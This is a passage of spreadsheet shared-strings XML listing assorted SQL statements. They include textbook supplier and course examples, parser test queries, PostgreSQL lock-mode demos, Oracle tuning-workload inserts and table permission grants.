    <t>GRANT SELECT ON TABLE metadatacollectionschema.microscopecollection TO hubuser</t>
  </si>
  <si>
    <t>GRANT SELECT ON TABLE metadatacollectionschema.projectscollection TO hubuser</t>
  </si>
  <si>
    <t>GRANT SELECT ON TABLE metadatacollectionschema.publishercollection TO hubuser</t>
  </si>
  <si>
    <t>GRANT SELECT ON TABLE metadatacollectionschema.relatedurlscollection TO hubuser</t>
  </si>
  <si>
    <t>GRANT SELECT ON TABLE metadatacollectionschema.subjectforcollection TO hubuser</t>
  </si>
  <si>
    <t>GRANT SELECT ON TABLE metadatacollectionschema.subjectseoccollection TO hubuser</t>
  </si>
  <si>
    <t>GRANT SELECT ON TABLE sylph.links, sylph.news, sylph.articles, sylph.software TO GROUP sylph_web</t>
  </si>
  <si>
    <t>GRANT SELECT,INSERT,UPDATE,DELETE ON TABLE sylph.banned_ips TO GROUP sylph_web</t>
  </si>
  <si>
    <t>GRANT SELECT,INSERT,UPDATE,DELETE ON TABLE sylph.banned_terms TO GROUP sylph_web</t>
  </si>
  <si>
    <t>GRANT SELECT,INSERT,UPDATE,DELETE ON TABLE sylph.comments TO GROUP sylph_web</t>
  </si>
  <si>
    <t>GRANT SELECT,INSERT,UPDATE,DELETE ON TABLE sylph.post_tags TO GROUP sylph_web</t>
  </si>
  <si>
    <t>GRANT SELECT,INSERT,UPDATE,DELETE ON TABLE sylph.post_types TO GROUP sylph_web</t>
  </si>
  <si>
    <t>GRANT SELECT,INSERT,UPDATE,DELETE ON TABLE sylph.posts TO GROUP sylph_web</t>
  </si>
  <si>
    <t>GRANT SELECT,INSERT,UPDATE,DELETE ON TABLE sylph.tags TO GROUP sylph_web</t>
  </si>
  <si>
    <t>GRANT SELECT,INSERT,UPDATE,DELETE ON TABLE sylph.users TO GROUP sylph_web</t>
  </si>
  <si>
    <t>GRANT SELECT,INSERT,UPDATE,DELETE ON TABLE sylph.versions TO GROUP sylph_web</t>
  </si>
  <si>
    <t>GRANT USAGE ON LANGUAGE SQL TO ALL</t>
  </si>
  <si>
    <t>GoogleGitSign in eclipse / datatools/org.eclipse.datatools.sqltools / DTP_1_7_0_Branch^ / . / tests / org.eclipse.datatools.sqltools.parsers.sql.query.test / src / org / eclipse / datatools / sqltools / parsers / sql / query / test / select2.sql blob: 5550e3189351adca14a02f2082af16976718cbd0 [file history] SELECT * FROM TBKT2102 ORDER BY DATE2, TIMESTAMP2, SORT_FIELD</t>
  </si>
  <si>
    <t xml:space="preserve">INSERT INTO #T1  ( SNO, Shipping )  SELECT SNO,SUM ( QTY )  FROM SP GROUP BY SNO UNION SELECT SNO,0 FROM S WHERE SNO NOT IN  ( SELECT SNO FROM SP ) </t>
  </si>
  <si>
    <t xml:space="preserve">INSERT INTO #T2  ( SNO, Used )  SELECT SNO,SUM ( QTY )  FROM SPJ GROUP BY SNO UNION SELECT SNO,0 FROM S WHERE SNO NOT IN  ( SELECT SNO FROM SPJ ) </t>
  </si>
  <si>
    <t xml:space="preserve">INSERT INTO Class VALUES ( 'CSE', 451, 'Introduction to Operating Systems' ) </t>
  </si>
  <si>
    <t xml:space="preserve">INSERT INTO Class VALUES ( 'CSE', 461, 'Introduction to Computer Communication Networks' ) </t>
  </si>
  <si>
    <t xml:space="preserve">INSERT INTO E ( ENO,EName,BossENO )  VALUES  ( 'E1','J.Smith',NULL ) </t>
  </si>
  <si>
    <t xml:space="preserve">INSERT INTO E ( ENO,EName,BossENO )  VALUES  ( 'E2','D.Brown','E1' ) </t>
  </si>
  <si>
    <t xml:space="preserve">INSERT INTO E ( ENO,EName,BossENO )  VALUES  ( 'E3','A.Sharma','E1' ) </t>
  </si>
  <si>
    <t xml:space="preserve">INSERT INTO E ( ENO,EName,BossENO )  VALUES  ( 'E4','B.Lee','E2' ) </t>
  </si>
  <si>
    <t xml:space="preserve">INSERT INTO E ( ENO,EName,BossENO )  VALUES  ( 'E5','S.Green','E2' ) </t>
  </si>
  <si>
    <t xml:space="preserve">INSERT INTO E ( ENO,EName,BossENO )  VALUES  ( 'E6','Q.Han','E3' ) </t>
  </si>
  <si>
    <t xml:space="preserve">INSERT INTO E ( ENO,EName,BossENO )  VALUES  ( 'E7','M.Patel','E3' ) </t>
  </si>
  <si>
    <t xml:space="preserve">INSERT INTO E ( ENO,EName,BossENO )  VALUES  ( 'E8','D.Jones','E7' ) </t>
  </si>
  <si>
    <t xml:space="preserve">INSERT INTO E ( ENO,EName,BossENO )  VALUES  ( 'E9','G.Bush','E7' ) </t>
  </si>
  <si>
    <t xml:space="preserve">INSERT INTO Instructor VALUES ( 'djw', 'David', 'Wetherall', '1999-07-01' ) </t>
  </si>
  <si>
    <t xml:space="preserve">INSERT INTO Instructor VALUES ( 'levy', 'Hank', 'Levy', date ( '1988-04-01'  )  )  </t>
  </si>
  <si>
    <t xml:space="preserve">INSERT INTO Instructor VALUES ( 'tom', 'Tom', 'Anderson', date ( '1997-10-01'  )  )  </t>
  </si>
  <si>
    <t xml:space="preserve">INSERT INTO Instructor VALUES ( 'zahorjan', 'John', 'Zahorjan', '1985-01-01' ) </t>
  </si>
  <si>
    <t xml:space="preserve">INSERT INTO TEST SELECT X FROM SYSTEM_RANGE ( 1, 1000 ) </t>
  </si>
  <si>
    <t xml:space="preserve">INSERT INTO TEST SELECT X, MOD ( X, 10 )  FROM SYSTEM_RANGE ( 1, 1000 ) </t>
  </si>
  <si>
    <t xml:space="preserve">INSERT INTO TEST SELECT X, MOD ( X, 100 ) , RAND (  ) *100 FROM SYSTEM_RANGE ( 1, 1000 ) </t>
  </si>
  <si>
    <t xml:space="preserve">INSERT INTO TEST SELECT X, MOD ( X, 5 ) , RAND (  ) *100 FROM SYSTEM_RANGE ( 1, 1000 ) </t>
  </si>
  <si>
    <t xml:space="preserve">INSERT INTO TEST SELECT X, RAND (  ) *100 FROM SYSTEM_RANGE ( 1, 1000 ) </t>
  </si>
  <si>
    <t xml:space="preserve">INSERT INTO TEST SELECT X, X/10 FROM SYSTEM_RANGE ( 1, 100 ) </t>
  </si>
  <si>
    <t xml:space="preserve">INSERT INTO Teaches VALUES ( 'djw', 'CSE', 461 ) </t>
  </si>
  <si>
    <t xml:space="preserve">INSERT INTO Teaches VALUES ( 'levy', 'CSE', 451 ) </t>
  </si>
  <si>
    <t xml:space="preserve">INSERT INTO Teaches VALUES ( 'tom', 'CSE', 451 ) </t>
  </si>
  <si>
    <t xml:space="preserve">INSERT INTO Teaches VALUES ( 'tom', 'CSE', 461 ) </t>
  </si>
  <si>
    <t xml:space="preserve">INSERT INTO Teaches VALUES ( 'zahorjan', 'CSE', 378 ) </t>
  </si>
  <si>
    <t xml:space="preserve">INSERT INTO Teaches VALUES ( 'zahorjan', 'CSE', 451 ) </t>
  </si>
  <si>
    <t xml:space="preserve">INSERT INTO Teaches VALUES ( 'zahorjan', 'CSE', 461 ) </t>
  </si>
  <si>
    <t xml:space="preserve">INSERT INTO lockdemo VALUES  ( 1 ) </t>
  </si>
  <si>
    <t xml:space="preserve">INSERT INTO lockdemo VALUES  ( 2 ) </t>
  </si>
  <si>
    <t xml:space="preserve">INSERT INTO lockdemo VALUES  ( 40 ) ,  ( 60 ) ,  ( 80 ) </t>
  </si>
  <si>
    <t xml:space="preserve">INSERT INTO lockdemo VALUES  ( 50 ) ,  ( 80 ) </t>
  </si>
  <si>
    <t xml:space="preserve">INSERT INTO sylph.comments ( post_id, comment_id )  VALUES  (  $1,  ( SELECT sylph.add_post ( ''comment'', $2, true, ''comment'', $3  )  )    ) </t>
  </si>
  <si>
    <t xml:space="preserve">INSERT INTO sylph.post_types ( name )  VALUES  ( 'article' ) </t>
  </si>
  <si>
    <t xml:space="preserve">INSERT INTO sylph.post_types ( name )  VALUES  ( 'comment' ) </t>
  </si>
  <si>
    <t xml:space="preserve">INSERT INTO sylph.post_types ( name )  VALUES  ( 'link' ) </t>
  </si>
  <si>
    <t xml:space="preserve">INSERT INTO sylph.post_types ( name )  VALUES  ( 'news' ) </t>
  </si>
  <si>
    <t xml:space="preserve">INSERT INTO sylph.post_types ( name )  VALUES  ( 'software' ) </t>
  </si>
  <si>
    <t>INSERT INTO temp SELECT Job.JobId,JobTDate,Job.ClientId,Job.Level, StartTime,VolumeName,JobMedia.StartFile,VolSessionId,VolSessionTime FROM Client,Job,JobMedia,Media WHERE Client.Name = '%1' AND Client.ClientId = Job.ClientId AND Level = 'F' AND JobStatus = 'T' AND JobMedia.JobId = Job.JobId AND JobMedia.MediaId = Media.MediaId ORDER BY Job.JobTDate DESC LIMIT 1</t>
  </si>
  <si>
    <t>INSERT INTO temp2 SELECT DISTINCT Job.JobId,Job.StartTime,Media.VolumeName, Job.Level,JobMedia.StartFile,Job.VolSessionId,Job.VolSessionTime FROM Job,temp,JobMedia,Media WHERE Job.JobTDate&gt;temp.JobTDate AND Job.ClientId = temp.ClientId AND Job.Level IN  ( 'I','D' )  AND JobStatus = 'T' AND JobMedia.JobId = Job.JobId AND JobMedia.MediaId = Media.MediaId</t>
  </si>
  <si>
    <t>INSERT INTO temp2 SELECT Job.JobId,Job.StartTime,Media.VolumeName,Job.Level, JobMedia.StartFile,Job.VolSessionId,Job.VolSessionTime FROM temp,Job,JobMedia,Media WHERE temp.JobId = Job.JobId AND Job.Level = 'F' AND Job.JobStatus = 'T' AND JobMedia.JobId = Job.JobId AND JobMedia.MediaId = Media.MediaId</t>
  </si>
  <si>
    <t xml:space="preserve">INSERT INTO user_workload  ( username, module, action, priority, elapsed_time, cpu_time, buffer_gets, disk_reads, rows_processed, executions, optimizer_cost, last_execution_date, stat_period, sql_text )  VALUES  ( 'SH', 'Example1', 'Action', 2, 1, 1, 1, 1, 1, 1000, 1, SYSDATE, 1, ' SELECT c.country_id, c.cust_city, c.cust_last_name FROM customers c WHERE c.country_id in  ( ''US'', ''UK'' )  ORDER BY c.country_id, c.cust_city, c.cust_last_name ' ) </t>
  </si>
  <si>
    <t xml:space="preserve">INSERT INTO user_workload  ( username, module, action, priority, elapsed_time, cpu_time, buffer_gets, disk_reads, rows_processed, executions, optimizer_cost, last_execution_date, stat_period, sql_text )  VALUES  ( 'SH', 'Example1', 'Action', 2, 1, 1, 1, 1, 1, 1000, 1, SYSDATE, 1, ' SELECT t.calendar_month_desc, sum ( s.amount_sold )  AS dollars FROM sales s , times t WHERE s.time_id  =  t.time_id AND s.time_id between TO_DATE ( ''01-JAN-2000'', ''DD-MON-YYYY'' )  AND TO_DATE ( ''01-JUL-2000'', ''DD-MON-YYYY'' )  GROUP BY t.calendar_month_desc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</si>
  <si>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t>
  </si>
  <si>
    <t xml:space="preserve">INSERT INTO user_workload  ( username, module, action, priority, elapsed_time, cpu_time, buffer_gets, disk_reads, rows_processed, executions, optimizer_cost, last_execution_date, stat_period, sql_text )  VALUES  ( 'SH', 'Example1', 'Action', 2, 1, 1, 1, 1, 1, 1000, 1, SYSDATE, 1,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t>
  </si>
  <si>
    <t>INSERT INTO user_workload  ( username, module, action, priority, sql_text )  VALUES  ( 'SH', 'Example1', 'Action', 2,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INSERT INTO user_workload  ( username, module, action, priority, sql_text )  VALUES  ( 'SH', 'Example1', 'Action', 2, 'SELECT t.calendar_month_desc, SUM ( s.amount_sold )  AS dollars FROM sales s , times t WHERE s.time_id  =  t.time_id AND s.time_id between TO_DATE ( ''01-JAN-2000'', ''DD-MON-YYYY'' )  AND TO_DATE ( ''01-JUL-2000'', ''DD-MON-YYYY'' )  GROUP BY t.calendar_month_desc' )  / INSERT INTO user_workload  ( username, module, action, priority, sql_text )  VALUES  ( 'SH', 'Example1', 'Action', 2,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INSERT INTO user_workload  ( username, module, action, priority, sql_text )  VALUES  ( 'SH', 'Example1', 'Action', 2, 'SELECT c.country_id, c.cust_city, c.cust_last_name FROM customers c WHERE c.country_id in  ( ''US'', ''UK'' )  ORDER BY c.country_id, c.cust_city, c.cust_last_name' )  / COMMIT</t>
  </si>
  <si>
    <t>LOCK TABLE lockdemo IN ACCESS EXCLUSIVE MODE</t>
  </si>
  <si>
    <t>LOCK TABLE lockdemo IN ACCESS SHARE MODE</t>
  </si>
  <si>
    <t>LOCK TABLE lockdemo IN EXCLUSIVE MODE</t>
  </si>
  <si>
    <t>LOCK TABLE lockdemo IN ROW EXCLUSIVE MODE</t>
  </si>
  <si>
    <t>LOCK TABLE lockdemo IN ROW SHARE MODE</t>
  </si>
  <si>
    <t>LOCK TABLE lockdemo IN SHARE MODE</t>
  </si>
  <si>
    <t>LOCK TABLE lockdemo IN SHARE ROW EXCLUSIVE MODE</t>
  </si>
  <si>
    <t>LOCK TABLE lockdemo IN SHARE UPDATE EXCLUSIVE MODE</t>
  </si>
  <si>
    <t xml:space="preserve">LOOP FETCH curs INTO v_action, v_command, v_attr1, v_attr2, v_attr3, v_attr4 </t>
  </si>
  <si>
    <t>OPEN sqlsetcur FOR SELECT VALUE ( P )  FROM TABLE (  dbms_sqltune.select_cursor_cache (  'sql_text like ''SELECT /* Query%''', NULL, NULL, NULL, NULL, NULL, null )   )  P</t>
  </si>
  <si>
    <t>PRINT :failed_stmts</t>
  </si>
  <si>
    <t>PRINT :saved_stmts</t>
  </si>
  <si>
    <t>RESET ALL</t>
  </si>
  <si>
    <t>ROLLBACK WORK</t>
  </si>
  <si>
    <t>SELECT 'Action Count', COUNT ( DISTINCT action_id )  cnt FROM user_advisor_actions WHERE task_name  =  :task_name</t>
  </si>
  <si>
    <t>SELECT   (  (    (  (    (  (    (  (  COUNT ( DISTINCT AVG_SMINT ) *2 ) /2 )  *13.3 ) /13.3 ) -25 ) +25 ) -33.556 ) +33.556 )  FROM  ( SELECT AVG ( SMINT )  AS AVG_SMINT FROM TBIPR302 WHERE TIME ( TIME ( CHAR ( TIME1  )  )   )  &lt; '17.58.58' GROUP BY CHAR1 )  AS TBL</t>
  </si>
  <si>
    <t>SELECT   (  (    (  (    (  (  COUNT ( DISTINCT CHAR1 ) *2 ) /2 ) *10 ) /10 ) +9999 ) -9999 )  FROM TBIPR302 WHERE '200' &lt; RECID AND '900' &gt; RECID</t>
  </si>
  <si>
    <t>SELECT * FROM #T1</t>
  </si>
  <si>
    <t>SELECT * FROM #T2</t>
  </si>
  <si>
    <t>SELECT * FROM  (  SELECT * FROM  (  SELECT * FROM  (  SELECT * FROM  (  SELECT * FROM  (  SELECT * FROM  (  SELECT * FROM  (  SELECT   (  (    (  (    (  (    (  (    (  (  COUNT ( * )  *2 ) /2 ) *10 ) /10 ) *1.5 ) *1.6 ) *1.7 ) *0.8 ) /10 ) -0.6 )  FROM TBIPR301 WHERE RECID &lt; '400'  )  AS TBLEXP6  )  AS TBLEXP5  )  AS TBLEXP4  )  AS TBLEXP3  )  AS TBLEXP2  )  AS TBLEXP1  )  AS TBLEXP0</t>
  </si>
  <si>
    <t>SELECT * FROM  (  SELECT * FROM  (  SELECT * FROM  (  SELECT * FROM  (  SELECT * FROM  (  SELECT * FROM  (  SELECT * FROM  (  SELECT ABS ( INTCOLNN )  FROM TBKT2101 WHERE RECID  =  '100'  )  AS TBLEXP6  )  AS TBLEXP5  )  AS TBLEXP4  )  AS TBLEXP3  )  AS TBLEXP2  )  AS TBLEXP1  )  AS TBLEXP0</t>
  </si>
  <si>
    <t>SELECT * FROM  ( SELECT * FROM Product AS Y WHERE Y.price &gt; '$20' )  AS x WHERE x.price &lt; '$30';</t>
  </si>
  <si>
    <t xml:space="preserve">SELECT * FROM Class WHERE dept  =  'CSE' AND 400 &lt; =  number AND number &lt; =  '499' </t>
  </si>
  <si>
    <t xml:space="preserve">SELECT * FROM Class WHERE title LIKE 'I_troduction%' </t>
  </si>
  <si>
    <t xml:space="preserve">SELECT * FROM Class WHERE title LIKE 'Introduction%' </t>
  </si>
  <si>
    <t xml:space="preserve">SELECT * FROM Class c WHERE c.dept  =  'CSE' AND c.number NOT IN  (  SELECT c.number FROM Class c, Teaches t, Instructor i WHERE c.dept  =  t.dept AND c.number  =  t.number AND t.username  =  i.username AND i.username IN  ( 'levy', 'djw' )   )  </t>
  </si>
  <si>
    <t>SELECT * FROM Customers WHERE Last_Name = 'Smith';</t>
  </si>
  <si>
    <t>SELECT * FROM E</t>
  </si>
  <si>
    <t>SELECT * FROM HIPPO WHERE CASE MOUTHS WHEN '061' THEN 'AAA' WHEN '010' THEN 'BBB' WHEN '118' THEN 'CCC' WHEN '087' THEN 'DDD' WHEN '000' THEN 'EEE' ELSE 'FFF' END &gt; 'CCC'</t>
  </si>
  <si>
    <t>SELECT * FROM HIPPO WHERE CASE POUNDS WHEN 6000 THEN 1 WHEN 8090 THEN 2 WHEN 10100 THEN 1 WHEN 12050 THEN 2 WHEN 1450 THEN 1 ELSE 3 END  =  1</t>
  </si>
  <si>
    <t xml:space="preserve">SELECT * FROM HIPPO WHERE CASE WHEN MOUTHS  =  '061' THEN CURRENT SERVER WHEN MOUTHS  =  '010' THEN USER WHEN MOUTHS  =  '118' THEN CURRENT SCHEMA WHEN MOUTHS  =  '087' THEN CURRENT SERVER WHEN MOUTHS  =  '000' THEN CURRENT DEGREE ELSE CURRENT PATH END IN  ( CURRENT SERVER, USER ) </t>
  </si>
  <si>
    <t xml:space="preserve">SELECT * FROM HIPPO WHERE EXISTS  (  SELECT CASE WHEN FOOD  =  'FIRED APPLES' THEN 1 END FROM HIPPO ) </t>
  </si>
  <si>
    <t xml:space="preserve">SELECT * FROM Instructor WHERE started_on &lt; DATE ( 'now' ) </t>
  </si>
  <si>
    <t xml:space="preserve">SELECT * FROM Instructor WHERE started_on &gt; =  DATE ( 'now', 'start of year', '-15 years' ) </t>
  </si>
  <si>
    <t>SELECT * FROM OUTERJN.TEMPTAB1 T1 LEFT JOIN OUTERJN.TEMPTAB3 T2 ON T1.COL1  =  T2.COL1</t>
  </si>
  <si>
    <t>SELECT * FROM Product WHERE category = 'Gadgets';</t>
  </si>
  <si>
    <t>SELECT * FROM S</t>
  </si>
  <si>
    <t>SELECT * FROM S INNER JOIN SP ON S.SNO  =  SP.SNO</t>
  </si>
  <si>
    <t>SELECT * FROM S INNER JOIN SP ON S.SNO  =  SP.SNO SELECT * FROM S LEFT OUTER JOIN SP ON S.SNO  =  SP.SNO SELECT * FROM S FULL OUTER JOIN SP ON S.SNO  =  SP.SNO</t>
  </si>
  <si>
    <t>SELECT * FROM S LEFT OUTER JOIN SP ON S.SNO  =  SP.SNO SELECT SUM ( QTY )  FROM SP WHERE SNO  =  'S9'</t>
  </si>
  <si>
    <t xml:space="preserve">SELECT * FROM S WHERE Len ( SNAME )  &gt;  ( SELECT Len ( SNAME )  FROM S WHERE SNO  =  'S9' ) </t>
  </si>
  <si>
    <t>SELECT * FROM S WHERE NOT STATUS &lt; null</t>
  </si>
  <si>
    <t>SELECT * FROM S WHERE NOT STATUS  =  null</t>
  </si>
  <si>
    <t>SELECT * FROM S WHERE NOT STATUS &gt; null</t>
  </si>
  <si>
    <t>SELECT * FROM S WHERE STATUS &lt; null</t>
  </si>
  <si>
    <t>SELECT * FROM S WHERE STATUS  =  null</t>
  </si>
  <si>
    <t>SELECT * FROM S WHERE STATUS &gt; null</t>
  </si>
  <si>
    <t>SELECT * FROM S,SP</t>
  </si>
  <si>
    <t>SELECT * FROM S,SP WHERE S.SNO  =  SP.SNO</t>
  </si>
  <si>
    <t>SELECT * FROM S,SP,P</t>
  </si>
  <si>
    <t>SELECT * FROM SP</t>
  </si>
  <si>
    <t>SELECT * FROM SP WHERE SNO  =  'S3' SELECT * FROM SPJ WHERE SNO  =  'S3' SELECT * FROM SP, SPJ WHERE SP.SNO  =  SPJ.SNO AND SP.SNO  =  'S3'</t>
  </si>
  <si>
    <t>SELECT * FROM SPJ</t>
  </si>
  <si>
    <t xml:space="preserve">SELECT * FROM T1 X WHERE C1 IN  (  SELECT C1 FROM T2 WHERE C2  =  CASE X.C3 WHEN 3 THEN C1 WHEN 4 THEN C2 END ) </t>
  </si>
  <si>
    <t xml:space="preserve">SELECT * FROM TEST WHERE ID IN ( 1, 1000 ) </t>
  </si>
  <si>
    <t>SELECT * FROM USER_TUNE_MVIEW WHERE TASK_NAME =  'cust_mv3' AND SCRIPT_TYPE = 'IMPLEMENTATION' ORDER BY action_id</t>
  </si>
  <si>
    <t>SELECT * FROM USER_TUNE_MVIEW WHERE TASK_NAME =  :task_cust_mv AND SCRIPT_TYPE = 'IMPLEMENTATION' ORDER BY action_id</t>
  </si>
  <si>
    <t>SELECT * FROM USER_TUNE_MVIEW WHERE TASK_NAME = 'cust_mv2' AND SCRIPT_TYPE = 'IMPLEMENTATION' ORDER BY action_id</t>
  </si>
  <si>
    <t>SELECT * FROM V1</t>
  </si>
  <si>
    <t>SELECT * FROM V2</t>
  </si>
  <si>
    <t>SELECT * FROM lockdemo</t>
  </si>
  <si>
    <t>SELECT * FROM lockdemo FOR SHARE</t>
  </si>
  <si>
    <t>SELECT * FROM lockdemo WHERE col  =  1 FOR SHARE</t>
  </si>
  <si>
    <t>SELECT * FROM lockdemo WHERE col  =  1 FOR UPDATE</t>
  </si>
  <si>
    <t>SELECT * FROM lockview1</t>
  </si>
  <si>
    <t>SELECT * FROM lockview2</t>
  </si>
  <si>
    <t xml:space="preserve">SELECT * FROM pg_stat_get_backend_idset (  )  AS t ( id )  WHERE pg_stat_get_backend_pid ( id )   =  pg_backend_pid (  ) </t>
  </si>
  <si>
    <t>SELECT /*+ ordered */ c.city, sdo_nn_distance  ( 1 )  distance_in_miles FROM geod_interstates i, geod_cities c WHERE i.highway  =  'I170' AND sdo_nn  ( c.location, i.geom, 'sdo_batch_size = 5 unit = mile', 1 )   =  'TRUE' AND pop90 &gt; 300000 AND rownum &lt; 6 ORDER by distance_in_miles</t>
  </si>
  <si>
    <t xml:space="preserve">SELECT ABS ( ABS ( ABS ( ABS ( ABS ( ABS ( ABS ( ABS ( ABS ( -FLOAT4WDN  )  )    )  )    )  )    )  )   )  FROM VWKT2102 WHERE ABS ( ABS ( ABS ( FLOAT4WDN  )  )   )   =  ABS ( -FLOAT4WDN ) </t>
  </si>
  <si>
    <t>SELECT ABS ( COUNT ( *  )  )   FROM TBKT2102 WHERE ABS ( FLOAT ( FLOAT4NN  )  )    =  FLOAT4NN</t>
  </si>
  <si>
    <t xml:space="preserve">SELECT ABS ( DAYOFWEEK ( TIMESTMP  )  )  ,ABS ( DAYOFMONTH ( TIMESTMP  )  )  , ABS ( DAYOFYEAR ( TIMESTMP  )  )   FROM VWKT2102 WHERE RECID  =  '001' AND ABS ( DAYOFWEEK ( DATE ( CURRENT TIMESTAMP  )  )   )   =  ABS ( DAYOFWEEK ( DATE ( CURRENT DATE  )  )   )  AND ABS ( DAYOFMONTH ( DATE ( CURRENT TIMESTAMP  )  )   )   =  ABS ( DAYOFMONTH ( CURRENT DATE  )  )   AND ABS ( DAYOFYEAR ( DATE ( CURRENT TIMESTAMP  )  )   )   =  ABS ( DAYOFYEAR ( DATE ( CURRENT TIMESTAMP  )  )   ) </t>
  </si>
  <si>
    <t>SELECT ABS ( HEX ( INTCOLNN  )  )   FROM VWKT2102 WHERE ABS ( HEX ( INTCOLNN  )  )    =  INTCOLNN</t>
  </si>
  <si>
    <t xml:space="preserve">SELECT ABS ( IFNULL  (  (  FLOAT ( IFNULL ( FLOAT ( RECID ) ,0  )  )   )  /  ( IFNULL ( FLOAT ( FILENO ) +1,0  )  )  ,0  )  )   FROM  ( SELECT A.RECID, B.FILENO, A.FLOAT4WDN, B.FLOAT8, A.FLOAT4NN, B.INTCOLWDN,A.VARCHAR20BIT,A.INTCOLNN,A.DEFNULL FROM VWKT2102 A, TBKT2102 B WHERE A.RECID  =  '001' )  AS TBK001 WHERE CASE WHEN ABS ( IFNULL ( 123.00*2,0.00000  )  )    =  ABS ( IFNULL ( FLOAT4WDN,123.00*2.0  )  )   THEN 1 WHEN ABS ( IFNULL ( REAL ( 123.0*2.0 ) ,0  )  )    =  ABS ( IFNULL ( INTEGER ( FLOAT ( 1000  )  )  ,0  )  )   THEN 2 WHEN ABS ( INTEGER  (  (  FLOAT4NN+1.0-2. ) *.1  )  )   &gt; =  ABS ( INTEGER ( INTCOLNN  )  )   THEN 6 WHEN ABS ( IFNULL ( SMALLINT ( RECID ) ,0  )  )    =  ABS ( IFNULL ( INTCOLWDN,INTEGER ( FILENO  )  )   )  THEN 3 WHEN ABS ( IFNULL ( SMALLINT ( RECID ) ,0  )  )   &lt; ABS ( IFNULL ( INTCOLWDN,INTEGER ( FILENO  )  )   )  THEN 4 WHEN ABS ( IFNULL ( SMALLINT ( RECID ) ,0  )  )   &gt; ABS ( IFNULL ( INTCOLWDN,INTEGER ( FILENO  )  )   )  THEN 5 ELSE 7 END IN  ( 0,1,2,3,4,5,6 ) </t>
  </si>
  <si>
    <t xml:space="preserve">SELECT ABS ( IFNULL ( FLOAT4WDN,FLOAT4WDN  )  )   FROM VWKT2102 WHERE ABS ( FLOAT ( FLOAT4NN  )  )    =  FLOAT ( FLOAT4NN ) </t>
  </si>
  <si>
    <t>SELECT ABS ( IFNULL ( FLOAT4WDN,FLOAT4WDN  )  )   FROM VWKT2102 WHERE ABS ( FLOAT4WDN )  IS NULL</t>
  </si>
  <si>
    <t>SELECT ABS ( INT ( DECIMAL ( FLOAT ( DOUBLE ( CEIL ( FLOOR ( 1  )  )    )  )    )  )   )  FROM  ( SELECT INT ( DECIMAL ( FLOAT ( DOUBLE ( CEIL ( FLOOR ( INTCOLNN  )  )    )  )    )  )   FROM VWKT2102 )  AS TBKT002</t>
  </si>
  <si>
    <t>SELECT ABS ( INT ( DECIMAL ( FLOAT ( DOUBLE ( CEIL ( FLOOR ( INTCOLNN  )  )    )  )    )  )   )  FROM VWKT2102</t>
  </si>
  <si>
    <t>SELECT ABS ( INTCOLNN )  FROM VWKT2102 WHERE ABS ( INTCOLNN )   =  INTCOLNN</t>
  </si>
  <si>
    <t>SELECT ABS ( INTCOLWDN )  FROM VWKT2102 WHERE ABS ( INTCOLWDN )  IS NULL</t>
  </si>
  <si>
    <t>SELECT ABS ( INTCOLWDN )  FROM VWKT2102 WHERE RECID = '959'</t>
  </si>
  <si>
    <t>SELECT ABS ( LVCHAR )  FROM VWKT2102 WHERE ABS ( LVCHAR )   =  LVCHAR</t>
  </si>
  <si>
    <t xml:space="preserve">SELECT ABS ( MIN ( SMINT ) /MIN ( SMINT  )  )   FROM VWKT2102 WHERE ABS ( SMALLINT ( RECID  )  )    =  ABS ( INTEGER ( FILENO  )  )   AND ABS ( SMALLINT ( RECID ) /SMALLINT ( FILENO  )  )   IN  ( SELECT ABS ( SMALLINT ( FLOAT8/FLOAT8  )  )   FROM TBKT2102 WHERE RECID  =  CHAR ( 100 )  AND SMALLINT ( RECID )  &lt;&gt;  ( SELECT MIN ( ABS ( INTCOLNN  )  )   FROM TBKT2102 WHERE ABS ( INTCOLNN )   =  INTCOLNN  )  )  </t>
  </si>
  <si>
    <t>SELECT ABS ( SMINT )  FROM VWKT2102 WHERE ABS ( SMINT )   =  SMINT</t>
  </si>
  <si>
    <t>SELECT ABS ( SUM ( FLOAT4NN+INTCOLNN+NUMERIC83NN+SMINT  )  )   FROM TBKT2102 WHERE RECID = '969'</t>
  </si>
  <si>
    <t>SELECT CASE WHEN ABS ( DECIMAL ( CONCAT ( RECID,'0'  )  )   )   =  ABS ( DECIMAL ( FILENO || '0'  )  )   THEN ABS ( 1 )  WHEN ABS ( DECIMAL ( CONCAT ( RECID,'0'  )  )   )  &lt; ABS ( DECIMAL ( FILENO || '0'  )  )   THEN ABS ( -1 )  WHEN ABS ( DECIMAL ( CONCAT ( RECID,'0'  )  )   )  &gt; ABS ( DECIMAL ( FILENO || '0'  )  )   THEN ABS ( -9 )  END FROM TBKT2102</t>
  </si>
  <si>
    <t>SELECT CASE WHEN ABS ( VARCHAR ( FILENO  )  )   &gt; VARCHAR ( RECID )  THEN ABS ( SMALLINT ( -9  )  )   WHEN VARCHAR ( FILENO )  &lt; VARCHAR ( RECID )  THEN ABS ( SMALLINT ( -1  )  )   WHEN VARCHAR ( FILENO )   =  VARCHAR ( RECID )  THEN ABS ( INT ( SMALLINT ( RECID ) /SMALLINT ( FILENO  )  )   )  END FROM TBKT2102</t>
  </si>
  <si>
    <t>SELECT CASE WHEN COUNT ( DISTINCT DOUBLE1 )   =  23 THEN 99999 WHEN COUNT ( * )   =  24 THEN 88888 WHEN COUNT ( DISTINCT DOUBLE1 )   =  25 THEN 77777 ELSE 10000 END FROM TBIPR302</t>
  </si>
  <si>
    <t>SELECT CITY, COUNT ( * )  AS NumberOfPlus10Suppliers FROM S WHERE STATUS &gt; 10 GROUP BY CITY HAVING COUNT ( * )  &gt; 1</t>
  </si>
  <si>
    <t>SELECT CITY, COUNT ( * )  AS NumberOfSuppliers FROM S EXECUTE ResetSampleData</t>
  </si>
  <si>
    <t>SELECT CITY, SNO, COUNT ( * )  AS NumberOfPlus10Suppliers FROM S WHERE STATUS &gt; 10 GROUP BY CITY HAVING COUNT ( * )  &gt; 1</t>
  </si>
  <si>
    <t>SELECT COALESCE ( #T2.SNO,#T1.SNO )  AS SNO, COALESCE ( Shipping,0 )  + COALESCE ( Used,0 )  AS Total FROM #T1 FULL OUTER JOIN #T2 ON #T1.SNO  =  #T2.SNO</t>
  </si>
  <si>
    <t>SELECT COALESCE ( V2.SNO,V1.SNO )  AS SNO, COALESCE ( Shipping,0 )  + COALESCE ( Used,0 )  AS Total FROM V1 FULL OUTER JOIN V2 ON V1.SNO  =  V2.SNO</t>
  </si>
  <si>
